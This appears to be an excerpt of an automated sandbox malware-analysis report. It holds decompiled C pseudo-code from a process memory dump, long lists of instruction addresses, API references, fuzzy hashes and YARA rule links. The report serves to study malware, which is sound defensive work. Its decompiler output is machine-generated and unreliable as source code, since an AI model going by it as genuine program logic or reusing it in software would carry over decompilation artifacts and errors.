									 *((intOrPtr*)(_t372 + 0x16c)) =  *((intOrPtr*)(_t370 + 4));
									 *(_t341 + 0x10) =  *(_t370 + 8);
									 *((intOrPtr*)(_t341 + 0x14)) =  *((intOrPtr*)(_t370 + 0xc));
									goto L39;
								}
								asm("rdtsc");
								L32:
								 *(_t341 + 0x10) = _t271;
								 *((intOrPtr*)(_t341 + 0x14)) = 0;
								goto L34;
							}
							_t271 = E0259BCFC();
							goto L32;
						}
						_push(0);
						_push( &_v68);
						_push(_v16);
						_push(_t372);
						_push( &_v60);
						_push(0);
						_push(0);
						_push(0);
						_v68 = 0;
						_v64 = 0;
						_t314 = E024DF900(_v12);
						_a4 = _t314;
						__eflags = _t314;
						if(_t314 < 0) {
							goto L49;
						}
						_t316 =  *(_t372 + 0x88) >> 1;
						__eflags = _t316 & 0x00000001;
						if((_t316 & 0x00000001) == 0) {
							__eflags =  *((intOrPtr*)(_t372 + 0x6c)) -  *0x7ffe026c;
							if( *((intOrPtr*)(_t372 + 0x6c)) !=  *0x7ffe026c) {
								goto L18;
							}
							__eflags =  *((intOrPtr*)(_t372 + 0x6d)) -  *0x7ffe0270;
							if( *((intOrPtr*)(_t372 + 0x6d)) !=  *0x7ffe0270) {
								goto L18;
							}
							__eflags =  *((intOrPtr*)(_t372 + 0x94)) - 4;
							if( *((intOrPtr*)(_t372 + 0x94)) != 4) {
								goto L18;
							}
							_t319 =  *((intOrPtr*)(_t372 + 0x68));
							_t343 =  *(_t372 + 0x8c);
							_v16 = _t319;
							__eflags = _t319 + 0xfffffc00 - 0xffc00;
							if(_t319 + 0xfffffc00 > 0xffc00) {
								goto L18;
							}
							__eflags = _t343;
							if(_t343 == 0) {
								goto L18;
							}
							_t348 =  *(_t372 + 0x78) |  *(_t372 + 0x7c);
							__eflags =  *(_t372 + 0x78) |  *(_t372 + 0x7c);
							if(( *(_t372 + 0x78) |  *(_t372 + 0x7c)) == 0) {
								goto L18;
							}
							_t348 =  *(_t372 + 0x74);
							__eflags =  *(_t372 + 0x74) -  *(_t370 + 0x7c);
							if( *(_t372 + 0x74) !=  *(_t370 + 0x7c)) {
								goto L18;
							}
							_push(0);
							_push( &_v68);
							 *(_t372 + 0x78) = 0;
							 *(_t372 + 0x7c) = 0;
							_push( *(_t370 + 0x80));
							_t348 =  &_v60;
							_push(_t372);
							_push( &_v60);
							_push(0);
							_push(0);
							_push(0);
							_t322 = E024DF938(_v12);
							 *(_t370 + 0xec) =  *(_t370 + 0xec) & 0x00000000;
							_a4 = _t322;
							_t323 = _v16;
							 *(_t370 + 0x100) = _t343;
							 *(_t370 + 0xd8) = _t343;
							 *(_t370 + 0xf4) =  *(_t370 + 0xf4) & 0x00000000;
							 *(_t370 + 0x80) = _t323;
							 *(_t370 + 0xe8) = _t323;
							 *(_t370 + 0xf0) = _t343 * _t323;
							 *(_t370 + 0x5c) = _v12;
							goto L51;
						}
						L18:
						_a4 = 0xc000000d;
						goto L49;
					}
					_a4 = 0xc0000017;
					goto L52;
				}
				_push(_t340);
				_push(0x2c);
				_push( &_v144);
				_t326 = E024DFDC0(_t340);
				_a4 = _t326;
				if(_t326 < _t340) {
					goto L54;
				}
				_push(_t340);
				_push(0x1c);
				_push( &_v172);
				_push(_t340);
				_t328 = E024DFC18(0xfffffffe);
				_a4 = _t328;
				if(_t328 < _t340) {
					goto L54;
				}
				_push(_t340);
				_push(0x20);
				_push( &_v100);
				_push(1);
				_t330 = E024DFC18(0xfffffffe);
				_a4 = _t330;
				if(_t330 < _t340) {
					goto L54;
				}
				_push(_t340);
				_push(0x30);
				_push( &_v220);
				_t332 = E024DFDC0(3);
				_a4 = _t332;
				if(_t332 < _t340) {
					goto L54;
				}
				_t334 = E02538001(_t348, _t360, _t370, _t340,  &_v20);
				_a4 = _t334;
				if(_t334 < _t340) {
					goto L54;
				}
				_t348 =  *(_t370 + 0x60) & 0x0000ffff;
				_t238 = ( *(_t370 + 0x68) & 0x0000ffff) + ( *(_t370 + 0x60) & 0x0000ffff) + 0x17c;
				goto L12;
			}





































































                                                                                                                                                    0x0259e9ff
                                                                                                                                                    0x0259ea0f
                                                                                                                                                    0x0259ea11
                                                                                                                                                    0x0259ea1c
                                                                                                                                                    0x0259ea22
                                                                                                                                                    0x0259ea2c
                                                                                                                                                    0x0259ea2f
                                                                                                                                                    0x0259ea35
                                                                                                                                                    0x0259ea3a
                                                                                                                                                    0x0259ea44
                                                                                                                                                    0x0259ea48
                                                                                                                                                    0x0259ea4b
                                                                                                                                                    0x0259ea4b
                                                                                                                                                    0x0259ea4d
                                                                                                                                                    0x0259ea50
                                                                                                                                                    0x0259ea53
                                                                                                                                                    0x0259ea56
                                                                                                                                                    0x0259ea5b
                                                                                                                                                    0x0259ea5d
                                                                                                                                                    0x0259ea5d
                                                                                                                                                    0x0259ea61
                                                                                                                                                    0x0259ea6a
                                                                                                                                                    0x0259ea6d
                                                                                                                                                    0x0259ea6f
                                                                                                                                                    0x0259ea7d
                                                                                                                                                    0x0259ea7d
                                                                                                                                                    0x0259ea85
                                                                                                                                                    0x0259ea8e
                                                                                                                                                    0x0259ea94
                                                                                                                                                    0x0259eb2f
                                                                                                                                                    0x0259eb32
                                                                                                                                                    0x0259eb35
                                                                                                                                                    0x0259eb35
                                                                                                                                                    0x0259eb39
                                                                                                                                                    0x0259eb3c
                                                                                                                                                    0x0259eb3c
                                                                                                                                                    0x0259eb3f
                                                                                                                                                    0x0259eb42
                                                                                                                                                    0x0259eb58
                                                                                                                                                    0x0259eb5c
                                                                                                                                                    0x0259eb81
                                                                                                                                                    0x0259eb81
                                                                                                                                                    0x0259eb84
                                                                                                                                                    0x0259eb8b
                                                                                                                                                    0x0259eb8d
                                                                                                                                                    0x0259eb90
                                                                                                                                                    0x0259ef60
                                                                                                                                                    0x0259ef60
                                                                                                                                                    0x0259ef64
                                                                                                                                                    0x0259ef69
                                                                                                                                                    0x0259ef69
                                                                                                                                                    0x0259ef6e
                                                                                                                                                    0x0259ef6e
                                                                                                                                                    0x0259ef6e
                                                                                                                                                    0x0259ef70
                                                                                                                                                    0x0259ef72
                                                                                                                                                    0x0259ef82
                                                                                                                                                    0x0259ef82
                                                                                                                                                    0x0259ef87
                                                                                                                                                    0x0259ef8e
                                                                                                                                                    0x0259ef8e
                                                                                                                                                    0x0259eb96
                                                                                                                                                    0x0259eb9a
                                                                                                                                                    0x0259ec92
                                                                                                                                                    0x0259ec98
                                                                                                                                                    0x0259ec9a
                                                                                                                                                    0x0259eca0
                                                                                                                                                    0x0259eca4
                                                                                                                                                    0x0259eca7
                                                                                                                                                    0x0259ecab
                                                                                                                                                    0x0259ecae
                                                                                                                                                    0x0259ecb1
                                                                                                                                                    0x0259ee59
                                                                                                                                                    0x0259ee68
                                                                                                                                                    0x0259ee6b
                                                                                                                                                    0x0259ee74
                                                                                                                                                    0x0259ee76
                                                                                                                                                    0x0259ee7a
                                                                                                                                                    0x0259ee7e
                                                                                                                                                    0x0259ee82
                                                                                                                                                    0x0259ee8c
                                                                                                                                                    0x0259ee8c
                                                                                                                                                    0x0259ee84
                                                                                                                                                    0x0259ee84
                                                                                                                                                    0x0259ee84
                                                                                                                                                    0x0259ee84
                                                                                                                                                    0x0259ee95
                                                                                                                                                    0x0259ee9c
                                                                                                                                                    0x0259eea4
                                                                                                                                                    0x0259eea4
                                                                                                                                                    0x0259eea7
                                                                                                                                                    0x0259eeaa
                                                                                                                                                    0x0259eeac
                                                                                                                                                    0x0259eeae
                                                                                                                                                    0x0259eeb1
                                                                                                                                                    0x0259eeb8
                                                                                                                                                    0x0259eec0
                                                                                                                                                    0x0259eec5
                                                                                                                                                    0x0259eeb1
                                                                                                                                                    0x0259eeca
                                                                                                                                                    0x0259eecb
                                                                                                                                                    0x0259eecc
                                                                                                                                                    0x0259eecd
                                                                                                                                                    0x0259eece
                                                                                                                                                    0x0259eed1
                                                                                                                                                    0x0259eed2
                                                                                                                                                    0x0259eed3
                                                                                                                                                    0x0259eed4
                                                                                                                                                    0x0259eed8
                                                                                                                                                    0x0259eedd
                                                                                                                                                    0x0259eee0
                                                                                                                                                    0x0259eee2
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0259eee4
                                                                                                                                                    0x0259eee4
                                                                                                                                                    0x0259eeea
                                                                                                                                                    0x0259eeec
                                                                                                                                                    0x0259ef2e
                                                                                                                                                    0x0259ef2e
                                                                                                                                                    0x0259ef34
                                                                                                                                                    0x0259ef3a
                                                                                                                                                    0x0259ef40
                                                                                                                                                    0x0259ef42
                                                                                                                                                    0x0259ef48
                                                                                                                                                    0x0259ef4e
                                                                                                                                                    0x0259ef54
                                                                                                                                                    0x0259ef5a
                                                                                                                                                    0x0259ef5d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0259ef5d
                                                                                                                                                    0x0259eeee
                                                                                                                                                    0x0259eef4
                                                                                                                                                    0x0259eef7
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0259eef9
                                                                                                                                                    0x0259eeff
                                                                                                                                                    0x0259ef04
                                                                                                                                                    0x0259ef06
                                                                                                                                                    0x0259ef06
                                                                                                                                                    0x0259ef0d
                                                                                                                                                    0x0259ef0f
                                                                                                                                                    0x0259ef12
                                                                                                                                                    0x0259ef17
                                                                                                                                                    0x0259ef1b
                                                                                                                                                    0x0259ef1f
                                                                                                                                                    0x0259ef22
                                                                                                                                                    0x0259ef27
                                                                                                                                                    0x0259ef2a
                                                                                                                                                    0x0259ef2c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0259ef2c
                                                                                                                                                    0x0259eee2
                                                                                                                                                    0x0259ecba
                                                                                                                                                    0x0259ecbd
                                                                                                                                                    0x0259ecc3
                                                                                                                                                    0x0259ecc6
                                                                                                                                                    0x0259ecc9
                                                                                                                                                    0x0259ecd2
                                                                                                                                                    0x0259ecd5
                                                                                                                                                    0x0259ece5
                                                                                                                                                    0x0259ece8
                                                                                                                                                    0x0259eceb
                                                                                                                                                    0x0259ecf3
                                                                                                                                                    0x0259ecf9
                                                                                                                                                    0x0259ecfc
                                                                                                                                                    0x0259ed02
                                                                                                                                                    0x0259ed0d
                                                                                                                                                    0x0259ed23
                                                                                                                                                    0x0259ed37
                                                                                                                                                    0x0259ed40
                                                                                                                                                    0x0259ed49
                                                                                                                                                    0x0259ed52
                                                                                                                                                    0x0259ed58
                                                                                                                                                    0x0259ed5c
                                                                                                                                                    0x0259ed67
                                                                                                                                                    0x0259ed6d
                                                                                                                                                    0x0259ed76
                                                                                                                                                    0x0259ed7c
                                                                                                                                                    0x0259ed82
                                                                                                                                                    0x0259ed88
                                                                                                                                                    0x0259ed92
                                                                                                                                                    0x0259ed9b
                                                                                                                                                    0x0259eda7
                                                                                                                                                    0x0259edb3
                                                                                                                                                    0x0259edbf
                                                                                                                                                    0x0259edcb
                                                                                                                                                    0x0259edd2
                                                                                                                                                    0x0259edd9
                                                                                                                                                    0x0259ede2
                                                                                                                                                    0x0259edf2
                                                                                                                                                    0x0259edf9
                                                                                                                                                    0x0259ee14
                                                                                                                                                    0x0259ee1c
                                                                                                                                                    0x0259ee23
                                                                                                                                                    0x0259ee28
                                                                                                                                                    0x0259ee2f
                                                                                                                                                    0x0259ee36
                                                                                                                                                    0x0259ee3f
                                                                                                                                                    0x0259ee48
                                                                                                                                                    0x0259ee4e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0259ee4e
                                                                                                                                                    0x0259ecd7
                                                                                                                                                    0x0259ecd9
                                                                                                                                                    0x0259ecd9
                                                                                                                                                    0x0259ecdc
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0259ecdc
                                                                                                                                                    0x0259eccb
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0259eccb
                                                                                                                                                    0x0259eba0
                                                                                                                                                    0x0259eba4
                                                                                                                                                    0x0259eba5
                                                                                                                                                    0x0259ebab
                                                                                                                                                    0x0259ebac
                                                                                                                                                    0x0259ebad
                                                                                                                                                    0x0259ebae
                                                                                                                                                    0x0259ebaf
                                                                                                                                                    0x0259ebb3
                                                                                                                                                    0x0259ebb6
                                                                                                                                                    0x0259ebb9
                                                                                                                                                    0x0259ebbe
                                                                                                                                                    0x0259ebc1
                                                                                                                                                    0x0259ebc3
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0259ebcf
                                                                                                                                                    0x0259ebd1
                                                                                                                                                    0x0259ebd3
                                                                                                                                                    0x0259ebe4
                                                                                                                                                    0x0259ebea
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0259ebef
                                                                                                                                                    0x0259ebf5
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0259ebf7
                                                                                                                                                    0x0259ebfe
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0259ec00
                                                                                                                                                    0x0259ec03
                                                                                                                                                    0x0259ec09
                                                                                                                                                    0x0259ec11
                                                                                                                                                    0x0259ec16
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0259ec1a
                                                                                                                                                    0x0259ec1c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0259ec21
                                                                                                                                                    0x0259ec21
                                                                                                                                                    0x0259ec24
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0259ec26
                                                                                                                                                    0x0259ec29
                                                                                                                                                    0x0259ec2c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0259ec2e
                                                                                                                                                    0x0259ec32
                                                                                                                                                    0x0259ec33
                                                                                                                                                    0x0259ec36
                                                                                                                                                    0x0259ec39
                                                                                                                                                    0x0259ec3f
                                                                                                                                                    0x0259ec42
                                                                                                                                                    0x0259ec43
                                                                                                                                                    0x0259ec44
                                                                                                                                                    0x0259ec45
                                                                                                                                                    0x0259ec46
                                                                                                                                                    0x0259ec4a
                                                                                                                                                    0x0259ec4f
                                                                                                                                                    0x0259ec56
                                                                                                                                                    0x0259ec59
                                                                                                                                                    0x0259ec5c
                                                                                                                                                    0x0259ec62
                                                                                                                                                    0x0259ec6b
                                                                                                                                                    0x0259ec72
                                                                                                                                                    0x0259ec78
                                                                                                                                                    0x0259ec81
                                                                                                                                                    0x0259ec87
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0259ec87
                                                                                                                                                    0x0259ebd5
                                                                                                                                                    0x0259ebd5
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0259ebd5
                                                                                                                                                    0x0259eb5e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0259eb5e
                                                                                                                                                    0x0259ea9a
                                                                                                                                                    0x0259ea9b
                                                                                                                                                    0x0259eaa3
                                                                                                                                                    0x0259eaa5
                                                                                                                                                    0x0259eaac
                                                                                                                                                    0x0259eaaf
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0259eab5
                                                                                                                                                    0x0259eab6
                                                                                                                                                    0x0259eabe
                                                                                                                                                    0x0259eabf
                                                                                                                                                    0x0259eac2
                                                                                                                                                    0x0259eac9
                                                                                                                                                    0x0259eacc
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0259ead2
                                                                                                                                                    0x0259ead3
                                                                                                                                                    0x0259ead8
                                                                                                                                                    0x0259ead9
                                                                                                                                                    0x0259eadd
                                                                                                                                                    0x0259eae4
                                                                                                                                                    0x0259eae7
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0259eaed
                                                                                                                                                    0x0259eaee
                                                                                                                                                    0x0259eaf6
                                                                                                                                                    0x0259eaf9
                                                                                                                                                    0x0259eb00
                                                                                                                                                    0x0259eb03
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0259eb0e
                                                                                                                                                    0x0259eb15
                                                                                                                                                    0x0259eb18
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0259eb22
                                                                                                                                                    0x0259eb26
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0259ED1C
                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0259ED32
                                                                                                                                                      • Part of subcall function 024DF900: LdrInitializeThunk.NTDLL ref: 024DF90E
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.2358341858.00000000024D0000.00000040.00000001.sdmp, Offset: 024C0000, based on PE: true
                                                                                                                                                    • Associated: 00000008.00000002.2358336152.00000000024C0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358434259.00000000025B0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358441192.00000000025C0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358447686.00000000025C4000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358453643.00000000025C7000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358501853.00000000025D0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358621738.0000000002630000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                                                                    • String ID: 409
                                                                                                                                                    • API String ID: 1404860816-1549806245
                                                                                                                                                    • Opcode ID: 9e2cc6addef524c309cc4af5253d67362ac08711b9c8f7f376d8fa5e594f3f82
                                                                                                                                                    • Instruction ID: 2012702e8559646384a3328318aa7508db59f4daf1f9254054bb6233bc064eb3
                                                                                                                                                    • Opcode Fuzzy Hash: 9e2cc6addef524c309cc4af5253d67362ac08711b9c8f7f376d8fa5e594f3f82
                                                                                                                                                    • Instruction Fuzzy Hash: CF024CB1900649EFDB15CF65C881BEABBF9FF08300F00856AE99AD7250D734A994CF64
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0259C371, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 127COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                                    			E0259C371(void* __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8, short _a12) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				char _v24;
				intOrPtr _t57;
				short _t58;
				intOrPtr _t61;
				signed char _t63;
				signed int _t65;
				signed int _t74;
				signed int _t75;
				intOrPtr* _t76;
				signed int _t80;
				signed int _t82;
				intOrPtr _t87;
				signed int _t89;
				signed int _t90;
				intOrPtr* _t91;
				signed int _t93;
				signed int _t94;
				intOrPtr _t97;

				_t87 = __edx;
				_v16 = _v16 & 0x00000000;
				_v8 = _v8 & 0x00000000;
				_t80 = _a8;
				_t57 =  *((intOrPtr*)(_t80 + 4));
				if(_t57 <= 0) {
					_t57 =  *((intOrPtr*)(_t80 + 8));
				}
				_t97 = _a4;
				 *((intOrPtr*)(_t80 + 0x30)) = _t57;
				_t89 =  *((intOrPtr*)(_t97 + 0x80));
				_t58 = _a12;
				_a8 = _t89;
				if(_t57 != 0x48 || _t58 == 1) {
					 *((short*)(_t80 + 0x34)) = _t58;
					 *((intOrPtr*)(_t80 + 0x10)) = E0259BCFC();
					 *((intOrPtr*)(_t80 + 0x14)) = _t87;
					__eflags =  *(_t97 + 0x5c);
					if( *(_t97 + 0x5c) == 0) {
						goto L25;
					}
					_t61 =  *((intOrPtr*)(_t80 + 0x30));
					__eflags = _t61 - _t89;
					if(_t61 < _t89) {
						_t78 = _t61 + _t80;
						__eflags = _t61 + _t80;
						E024EDFC0(_t78, 0xff, _t89 - _t61);
					}
					_t90 =  *(_t97 + 0xcc);
					_t63 = _t90 >> 3;
					__eflags = _t63 & 0x00000001;
					if((_t63 & 0x00000001) != 0) {
						_v16 = 2;
					}
					_t82 =  *(_t97 + 0xc8);
					__eflags = _t82;
					if(_t82 <= 0) {
						L18:
						_push(0);
						_t91 = _t97 + 0xf0;
						_push(_t91);
						_push(_a8);
						_push(_t80);
						_push( &_v24);
						_push(0);
						_push(0);
						_push(0);
						_t65 = E024DF938( *(_t97 + 0x5c));
						_v8 = _t65;
						__eflags = _t65;
						if(_t65 < 0) {
							__eflags = _t65 - 0x80000022;
							if(_t65 == 0x80000022) {
								goto L25;
							}
							__eflags = _v8 - 2;
							if(_v8 == 2) {
								goto L25;
							}
							goto L24;
						}
						 *_t91 =  *_t91 + _a8;
						asm("adc dword [edi+0x4], 0x0");
						 *((intOrPtr*)(_t97 + 0x100)) =  *((intOrPtr*)(_t97 + 0x100)) + 1;
						 *((intOrPtr*)(_t97 + 0xd8)) =  *((intOrPtr*)(_t97 + 0xd8)) + 1;
						goto L25;
					} else {
						asm("sbb eax, eax");
						asm("cdq");
						_v12 = E0250F1E0(( ~(_t90 & 0x00002000) & 0xfff00400) + 0x100000, _t87, _t82, 0);
						_t74 =  *((intOrPtr*)(_t97 + 0xd8)) + _v16;
						_t75 = _t74 * _a8;
						__eflags = _t74 * _a8 >> 0x20 - _t87;
						if(__eflags < 0) {
							goto L18;
						}
						if(__eflags > 0) {
							L14:
							_t93 = (_t90 & 0x0000000b) - 1;
							__eflags = _t93;
							if(_t93 == 0) {
								_v8 = 0xc0000188;
								L24:
								_t54 = _t97 + 0xfc;
								 *_t54 =  *(_t97 + 0xfc) + 1;
								__eflags =  *_t54;
								goto L25;
							}
							_t94 = _t93 - 1;
							__eflags = _t94;
							if(_t94 == 0) {
								_t76 = _t97 + 0xe8;
								 *((intOrPtr*)(_t97 + 0xf0)) =  *_t76;
								_t86 =  *((intOrPtr*)(_t76 + 4));
								 *((intOrPtr*)(_t97 + 0xf4)) =  *((intOrPtr*)(_t76 + 4));
								 *((intOrPtr*)(_t97 + 0xd8)) = E02524FC0( *_t76, _t86,  *((intOrPtr*)(_t97 + 0x80)), 0);
							} else {
								__eflags = _t94 == 6;
								if(_t94 == 6) {
									_t34 = _t97 + 0xd4;
									 *_t34 =  *(_t97 + 0xd4) | 0x00000001;
									__eflags =  *_t34;
								}
							}
							goto L18;
						}
						__eflags = _t75 - _v12;
						if(_t75 < _v12) {
							goto L18;
						}
						goto L14;
					}
				} else {
					_v8 = 0x80000022;
					L25:
					return _v8;
				}
			}
























                                                                                                                                                    0x0259c371
                                                                                                                                                    0x0259c379
                                                                                                                                                    0x0259c37d
                                                                                                                                                    0x0259c382
                                                                                                                                                    0x0259c385
                                                                                                                                                    0x0259c38c
                                                                                                                                                    0x0259c38e
                                                                                                                                                    0x0259c38e
                                                                                                                                                    0x0259c391
                                                                                                                                                    0x0259c394
                                                                                                                                                    0x0259c397
                                                                                                                                                    0x0259c3a0
                                                                                                                                                    0x0259c3a4
                                                                                                                                                    0x0259c3a7
                                                                                                                                                    0x0259c3bb
                                                                                                                                                    0x0259c3c4
                                                                                                                                                    0x0259c3c7
                                                                                                                                                    0x0259c3ca
                                                                                                                                                    0x0259c3ce
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0259c3d4
                                                                                                                                                    0x0259c3d7
                                                                                                                                                    0x0259c3d9
                                                                                                                                                    0x0259c3de
                                                                                                                                                    0x0259c3de
                                                                                                                                                    0x0259c3e6
                                                                                                                                                    0x0259c3eb
                                                                                                                                                    0x0259c3ee
                                                                                                                                                    0x0259c3f6
                                                                                                                                                    0x0259c3f9
                                                                                                                                                    0x0259c3fb
                                                                                                                                                    0x0259c3fd
                                                                                                                                                    0x0259c3fd
                                                                                                                                                    0x0259c404
                                                                                                                                                    0x0259c40a
                                                                                                                                                    0x0259c40c
                                                                                                                                                    0x0259c45f
                                                                                                                                                    0x0259c461
                                                                                                                                                    0x0259c462
                                                                                                                                                    0x0259c468
                                                                                                                                                    0x0259c469
                                                                                                                                                    0x0259c46f
                                                                                                                                                    0x0259c470
                                                                                                                                                    0x0259c471
                                                                                                                                                    0x0259c472
                                                                                                                                                    0x0259c473
                                                                                                                                                    0x0259c477
                                                                                                                                                    0x0259c47c
                                                                                                                                                    0x0259c47f
                                                                                                                                                    0x0259c481
                                                                                                                                                    0x0259c4d2
                                                                                                                                                    0x0259c4d7
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0259c4d9
                                                                                                                                                    0x0259c4dd
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0259c4dd
                                                                                                                                                    0x0259c486
                                                                                                                                                    0x0259c488
                                                                                                                                                    0x0259c48c
                                                                                                                                                    0x0259c492
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0259c40e
                                                                                                                                                    0x0259c417
                                                                                                                                                    0x0259c425
                                                                                                                                                    0x0259c42e
                                                                                                                                                    0x0259c437
                                                                                                                                                    0x0259c43c
                                                                                                                                                    0x0259c43f
                                                                                                                                                    0x0259c441
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0259c443
                                                                                                                                                    0x0259c44a
                                                                                                                                                    0x0259c44d
                                                                                                                                                    0x0259c44d
                                                                                                                                                    0x0259c44e
                                                                                                                                                    0x0259c4c9
                                                                                                                                                    0x0259c4df
                                                                                                                                                    0x0259c4df
                                                                                                                                                    0x0259c4df
                                                                                                                                                    0x0259c4df
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0259c4df
                                                                                                                                                    0x0259c450
                                                                                                                                                    0x0259c450
                                                                                                                                                    0x0259c451
                                                                                                                                                    0x0259c49a
                                                                                                                                                    0x0259c4aa
                                                                                                                                                    0x0259c4b0
                                                                                                                                                    0x0259c4b6
                                                                                                                                                    0x0259c4c1
                                                                                                                                                    0x0259c453
                                                                                                                                                    0x0259c453
                                                                                                                                                    0x0259c456
                                                                                                                                                    0x0259c458
                                                                                                                                                    0x0259c458
                                                                                                                                                    0x0259c458
                                                                                                                                                    0x0259c458
                                                                                                                                                    0x0259c456
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0259c451
                                                                                                                                                    0x0259c445
                                                                                                                                                    0x0259c448
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0259c448
                                                                                                                                                    0x0259c3af
                                                                                                                                                    0x0259c3af
                                                                                                                                                    0x0259c4e5
                                                                                                                                                    0x0259c4ec
                                                                                                                                                    0x0259c4ec

                                                                                                                                                    APIs
                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0259C4BC
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.2358341858.00000000024D0000.00000040.00000001.sdmp, Offset: 024C0000, based on PE: true
                                                                                                                                                    • Associated: 00000008.00000002.2358336152.00000000024C0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358434259.00000000025B0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358441192.00000000025C0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358447686.00000000025C4000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358453643.00000000025C7000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358501853.00000000025D0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358621738.0000000002630000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                    • String ID: "$409
                                                                                                                                                    • API String ID: 885266447-4048699559
                                                                                                                                                    • Opcode ID: 21b0ad0dda1a5bf92bd42300e84133f5eed5dd667f43441593c7c56666070728
                                                                                                                                                    • Instruction ID: 9471c11f1d348b5594d4139b088ebf56feaac084508831a5db48611111b5c53a
                                                                                                                                                    • Opcode Fuzzy Hash: 21b0ad0dda1a5bf92bd42300e84133f5eed5dd667f43441593c7c56666070728
                                                                                                                                                    • Instruction Fuzzy Hash: 494180B1600705EFDF24CF64C884BBABBB5FF49306F14885AE85A9B241D774E944CB58
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%